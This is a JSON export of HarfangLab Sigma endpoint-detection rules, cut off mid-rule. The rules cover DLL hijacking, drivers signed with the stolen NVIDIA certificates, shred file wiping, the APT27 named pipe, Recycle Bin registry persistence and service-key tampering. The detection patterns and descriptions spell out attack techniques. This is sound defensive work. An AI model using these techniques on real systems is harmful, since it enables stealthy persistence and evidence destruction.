"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080575Z",
"creation_date": "2026-03-23T11:45:34.080577Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080581Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bdservicehost.yml",
"content": "title: DLL Hijacking via bdservicehost.exe\nid: 0cde446e-6eec-4d9c-a4df-ad0b836c3406\ndescription: |\n Detects potential Windows DLL Hijacking via bdservicehost.exe, seen in a previous PlugX attack.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://secjoes-reports.s3.eu-central-1.amazonaws.com/Dissecting+PlugX+to+Extract+Its+Crown+Jewels.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/08\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'bdservicehost.exe'\n ProcessSignature: 'Bitdefender SRL'\n ImageLoaded|endswith: '\\log.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\BitDefender\\'\n - '?:\\Program Files (x86)\\BitDefender\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\BitDefender\\'\n - '?:\\Program Files (x86)\\BitDefender\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Bitdefender SRL'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0cde446e-6eec-4d9c-a4df-ad0b836c3406",
"rule_name": "DLL Hijacking via bdservicehost.exe",
"rule_description": "Detects potential Windows DLL Hijacking via bdservicehost.exe (a Bitdefender-signed executable), a technique observed in a PlugX intrusion described in the referenced analysis.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying the legitimate executable and planting a malicious log.dll within the same folder.\nLoads of log.dll from the Bitdefender installation directories or of libraries signed by Bitdefender SRL are filtered out.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-08",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0cf16516-206d-4746-b55e-291542898e67",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618982Z",
"creation_date": "2026-03-23T11:45:34.618984Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618988Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_klist.yml",
"content": "title: DLL Hijacking via klist.exe\nid: 0cf16516-206d-4746-b55e-291542898e67\ndescription: |\n Detects potential Windows DLL Hijacking via klist.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n Executions of klist.exe from System32, SysWOW64 or WinSxS, loads of a library located in one of those directories, and libraries that are themselves signed by Microsoft Windows are excluded.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'klist.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbghelp.dll'\n - '\\netutils.dll'\n - '\\secur32.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0cf16516-206d-4746-b55e-291542898e67",
"rule_name": "DLL Hijacking via klist.exe",
"rule_description": "Detects potential Windows DLL Hijacking via klist.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nExecutions of klist.exe from System32, SysWOW64 or WinSxS, loads of a library located in one of those directories, and libraries that are themselves signed by Microsoft Windows are excluded.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079072Z",
"creation_date": "2026-03-23T11:45:34.079074Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079079Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_nvidia_stolen_cert_driver_load.yml",
"content": "title: Driver Loaded Signed with NVIDIA Stolen Certificate\nid: 0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8\ndescription: |\n Detects the loading of a driver signed with one of the NVIDIA code-signing certificates that were stolen and leaked in 2022.\n Because the certificate is genuine, the signature verifies correctly, so malware signed with it can appear legitimate and evade AV/EDR detection.\n Drivers whose PE compilation timestamp falls within the date ranges excluded by the rule (presumably the period of legitimate use of each certificate), or whose copyright string mentions NVIDIA or Galasoft, are filtered out. Both the PE timestamp and the copyright string are under the control of whoever built the driver, so these filters reduce noise but can be bypassed.\n It is recommended to find the process responsible for this action using the related timeline or through jobs, as well as to analyze the loaded driver to look for malicious content and actions.\nreferences:\n - https://blog.malwarebytes.com/awareness/2022/03/stolen-nvidia-certificates-used-to-sign-malware-heres-what-to-do/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2022/07/12\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.DriverLoad\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: driver_load\ndetection:\n selection_cert_1:\n DriverSignatureSignerThumbprint: '579aec4489a2ca8a2a09df5dc0323634bd8b16b7'\n\n filter_timestamp_cert_1:\n DriverPETimestampStr|startswith:\n - '2011-'\n - '2012-'\n - '2013-'\n - '2014-01'\n - '2014-02'\n - '2014-03'\n - '2014-04'\n - '2014-05'\n - '2014-06'\n - '2014-07'\n - '2014-08'\n\n selection_cert_2:\n DriverSignatureSignerThumbprint: '30632ea310114105969d0bda28fdce267104754f'\n\n filter_timestamp_cert_2:\n DriverPETimestampStr|startswith:\n - '2015-07'\n - '2015-08'\n - '2015-09'\n - '2015-10'\n - '2015-11'\n - '2015-12'\n - '2016-'\n - '2017-'\n - '2018-01'\n - '2018-02'\n - '2018-03'\n - '2018-04'\n - '2018-05'\n - '2018-06'\n - '2018-07'\n\n filter_copyright:\n LegalCopyright|contains:\n - 'NVIDIA'\n - 'Galasoft'\n\n condition: ((selection_cert_1 and not filter_timestamp_cert_1) or (selection_cert_2 and not filter_timestamp_cert_2)) and not filter_copyright\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d1a3edd-eeb6-4a1c-8c08-047b57bbe2d8",
"rule_name": "Driver Loaded Signed with NVIDIA Stolen Certificate",
"rule_description": "Detects the loading of a driver signed with one of the NVIDIA code-signing certificates that were stolen and leaked in 2022.\nBecause the certificate is genuine, the signature verifies correctly, so malware signed with it can appear legitimate and evade AV/EDR detection.\nDrivers whose PE compilation timestamp falls within the date ranges excluded by the rule (presumably the period of legitimate use of each certificate), or whose copyright string mentions NVIDIA or Galasoft, are filtered out. Both the PE timestamp and the copyright string are under the control of whoever built the driver, so these filters reduce noise but can be bypassed.\nIt is recommended to find the process responsible for this action using the related timeline or through jobs, as well as to analyze the loaded driver to look for malicious content and actions.\n",
"rule_creation_date": "2022-07-12",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d4bd1c5-18a6-4c6e-a08e-48adc41e2884",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628455Z",
"creation_date": "2026-03-23T11:45:34.628457Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628462Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://man7.org/linux/man-pages/man1/shred.1.html",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-3---overwrite-and-delete-a-file-with-shred",
"https://attack.mitre.org/techniques/T1070/004/",
"https://attack.mitre.org/techniques/T1485/"
],
"name": "t1070_004_delete_with_shred.yml",
"content": "title: File Deleted via shred\nid: 0d4bd1c5-18a6-4c6e-a08e-48adc41e2884\ndescription: |\n Detects the execution of shred with the -u (remove) option, which overwrites a file's content and then deletes it.\n Attackers can shred files left behind by their malicious activities to hinder forensics and slow down the investigation, or use shred to destroy sensitive information as part of a ransomware attack.\n Note that only the short -u flag (alone or combined with other short flags) is matched; the long form --remove is not covered by this rule.\n It is recommended to investigate the parent process as well as the files being deleted to determine whether this action was legitimate.\nreferences:\n - https://man7.org/linux/man-pages/man1/shred.1.html\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md#atomic-test-3---overwrite-and-delete-a-file-with-shred\n - https://attack.mitre.org/techniques/T1070/004/\n - https://attack.mitre.org/techniques/T1485/\ndate: 2023/01/06\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1070.004\n - attack.impact\n - attack.t1485\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Shred\n - classification.Linux.Behavior.Deletion\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/shred'\n CommandLine|contains:\n - ' -u'\n - ' -?u'\n - ' -??u'\n - ' -???u'\n\n exclusion_space:\n CommandLine|contains:\n - ' - u'\n - ' -? u'\n - ' -?? u'\n\n exclusion_plz_sandbox:\n ParentCommandLine: '/tmp/plz_sandbox/third_party/system_tools/logrotate/logrotate -v -m ./mailer -s state test-config.15 --force'\n\n exclusion_blacknoise:\n ParentCommandLine: 'sudo -S shred -u /tmp/blacknoise_BLCKNS_DEF_L0007.001'\n\n exclusion_logrotate:\n ParentCommandLine: '/usr/sbin/logrotate /etc/logrotate.conf'\n CommandLine: 'shred -u -'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d4bd1c5-18a6-4c6e-a08e-48adc41e2884",
"rule_name": "File Deleted via shred",
"rule_description": "Detects the execution of shred with the -u (remove) option, which overwrites a file's content and then deletes it.\nAttackers can shred files left behind by their malicious activities to hinder forensics and slow down the investigation, or use shred to destroy sensitive information as part of a ransomware attack.\nNote that only the short -u flag (alone or combined with other short flags) is matched; the long form --remove is not covered by this rule.\nIt is recommended to investigate the parent process as well as the files being deleted to determine whether this action was legitimate.\n",
"rule_creation_date": "2023-01-06",
"rule_modified_date": "2026-02-11",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1070.004",
"attack.t1485"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d4ebd0c-1c3f-4c6b-8c60-121639f8b842",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595420Z",
"creation_date": "2026-03-23T11:45:34.595423Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595431Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.intrinsec.com/apt27-analysis/",
"https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
"https://attack.mitre.org/techniques/T1106/"
],
"name": "t1106_apt27_named_pipe_connection.yml",
"content": "title: Suspicious APT27 Related Named Pipe Connected\nid: 0d4ebd0c-1c3f-4c6b-8c60-121639f8b842\ndescription: |\n Detects the creation or connection of/to a Named Pipe named \"testPipe\".\n The name is related to the APT27 threat, more specifically their HyperBro malware.\n It is recommended to verify that this is a legitimate developer pipe.\nreferences:\n - https://www.intrinsec.com/apt27-analysis/\n - https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html\n - https://attack.mitre.org/techniques/T1106/\ndate: 2022/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1106\n - attack.t1559\n - classification.Windows.Source.NamedPipe\n - classification.Windows.ThreatActor.APT27\n - classification.Windows.Malware.HyperBro\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: named_pipe_connection\ndetection:\n selection:\n PipeName: '\\testPipe'\n\n exclusion_hellodoc:\n ProcessImage|endswith:\n - '\\IMAGINE Editions\\HelloDoc\\HelloDoc.exe'\n - '\\imagine editions\\hellodoc\\HelloDoc Acces Vidal.exe'\n ProcessSigned: 'true'\n\n condition: selection and not 1 of exclusion_*\nfalsepositives:\n - Legitimate developer creation of a named pipe called \"testPipe\"\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d4ebd0c-1c3f-4c6b-8c60-121639f8b842",
"rule_name": "Suspicious APT27 Related Named Pipe Connected",
"rule_description": "Detects the creation or connection of/to a Named Pipe named \"testPipe\".\nThe name is related to the APT27 threat, more specifically their HyperBro malware.\nIt is recommended to verify that this is a legitimate developer pipe.\n",
"rule_creation_date": "2022-10-26",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1106",
"attack.t1559"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d51dffe-a29c-4bbf-a33a-b2308e77bfda",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085080Z",
"creation_date": "2026-03-23T11:45:34.085082Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085086Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/recyclebin.md",
"https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/",
"https://attack.mitre.org/techniques/T1546/015/"
],
"name": "t1546_015_recycle_bin_persistence.yml",
"content": "title: Recycle Bin COM Object Modified\nid: 0d51dffe-a29c-4bbf-a33a-b2308e77bfda\ndescription: |\n Detects the creation of the subkey \"\\shell\\open\\command\" under the Recycle Bin ClassID in the registry.\n The Windows Registry uses ClassID subkeys to define shell actions for system folders and objects. The Recycle Bin has a specific ClassID ({645FF040-5081-101B-9F08-00AA002F954E}) that can be modified with a \"\\shell\\open\\command\" subkey to override the default open action.\n When this subkey is created or modified under the Recycle Bin's ClassID, it redirects the default open action to execute a custom command.\n Attackers exploit this mechanism to achieve persistence by ensuring their malicious code runs whenever a user attempts to access the Recycle Bin through Windows Explorer or other file management operations.\n It is recommended to verify whether the registry modification is legitimate and analyze the command specified in the modified registry key to determine if it points to malicious executables or scripts.\nreferences:\n - https://github.com/persistence-info/persistence-info.github.io/blob/main/Data/recyclebin.md\n - https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/\n - https://attack.mitre.org/techniques/T1546/015/\ndate: 2025/04/24\nmodified: 2025/10/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1546.015\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'CreateKey'\n TargetObject|endswith: '\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d51dffe-a29c-4bbf-a33a-b2308e77bfda",
"rule_name": "Recycle Bin COM Object Modified",
"rule_description": "Detects the creation of the subkey \"\\shell\\open\\command\" under the Recycle Bin ClassID in the registry.\nThe Windows Registry uses ClassID subkeys to define shell actions for system folders and objects. The Recycle Bin has a specific ClassID ({645FF040-5081-101B-9F08-00AA002F954E}) that can be modified with a \"\\shell\\open\\command\" subkey to override the default open action.\nWhen this subkey is created or modified under the Recycle Bin's ClassID, it redirects the default open action to execute a custom command.\nAttackers exploit this mechanism to achieve persistence by ensuring their malicious code runs whenever a user attempts to access the Recycle Bin through Windows Explorer or other file management operations.\nIt is recommended to verify whether the registry modification is legitimate and analyze the command specified in the modified registry key to determine if it points to malicious executables or scripts.\n",
"rule_creation_date": "2025-04-24",
"rule_modified_date": "2025-10-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.015"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d55020f-bbfc-470c-addf-f5feb6e37098",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.609954Z",
"creation_date": "2026-03-23T11:45:34.609967Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.609975Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_registry_unprivileged_user_modifying_service_registry_config.yml",
"content": "title: Service Registry Configuration Modified by an Unprivileged User\nid: 0d55020f-bbfc-470c-addf-f5feb6e37098\ndescription: |\n Detects a change to a service registry configuration value (ImagePath, FailureCommand or ServiceDll) written by a process running at Low or Medium integrity level, i.e. without elevation.\n Attackers can abuse weak permissions on a service registry key to escalate privileges or persist by pointing a privileged service at a binary or DLL they control.\n It is recommended to investigate the modified registry value for paths pointing to malicious content, and to review the ACL of the service key to understand how a non-elevated process was able to write to it.\nreferences:\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/09/07\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.persistence\n - attack.t1574.011\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n ProcessIntegrityLevel:\n - 'Low'\n - 'Medium'\n TargetObject:\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ImagePath'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\FailureCommand'\n - 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\\\*\\ServiceDll'\n\n exclusion_novell:\n # \\??\\C:\\Program Files\\Novell\\Client\\XTier\\Drivers\\nccache.sys\n Details|contains: ':\\Program Files\\Novell\\Client\\XTier\\Drivers\\'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "0d55020f-bbfc-470c-addf-f5feb6e37098",
"rule_name": "Service Registry Configuration Modified by an Unprivileged User",
"rule_description": "Detects a change to a service registry configuration value (ImagePath, FailureCommand or ServiceDll) written by a process running at Low or Medium integrity level, i.e. without elevation.\nAttackers can abuse weak permissions on a service registry key to escalate privileges or persist by pointing a privileged service at a binary or DLL they control.\nIt is recommended to investigate the modified registry value for paths pointing to malicious content, and to review the ACL of the service key to understand how a non-elevated process was able to write to it.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "0d5af151-1912-4b7d-aa38-cacd25e43f67",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296528Z",
"creation_date": "2026-03-23T11:45:35.296531Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296535Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1007/"
],
"name": "t1007_net_start.yml",
"content": "title: System Service Discovered via net.exe\nid: 0d5af151-1912-4b7d-aa38-cacd25e43f67\ndescription: |\n Detects the execution of net1.exe with start option.\n Adversaries can use this command during discovery phase to enumerate started system services.\n It is recommended to investigate the parent process to look for malicious content or other malicious actions.\nreferences:\n - https://attack.mitre.org/techniques/T1007/\ndate: 2022/11/14\nmodified: 2026/02/20\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1007\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n\n selection_commandline:\n CommandLine|endswith: ' start'\n CurrentDirectory|startswith:\n - '?:\\windows\\'\n - '?:\\ProgramData\\'\n - '?:\\PerfLogs\\'\n - '?:\\temp\\'\n - '?:\\users\\'\n - '?:\\\\?Recycle.Bin\\'\n\n exclusion_programfiles:\n - GrandparentImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - Ancestors|startswith:\n - 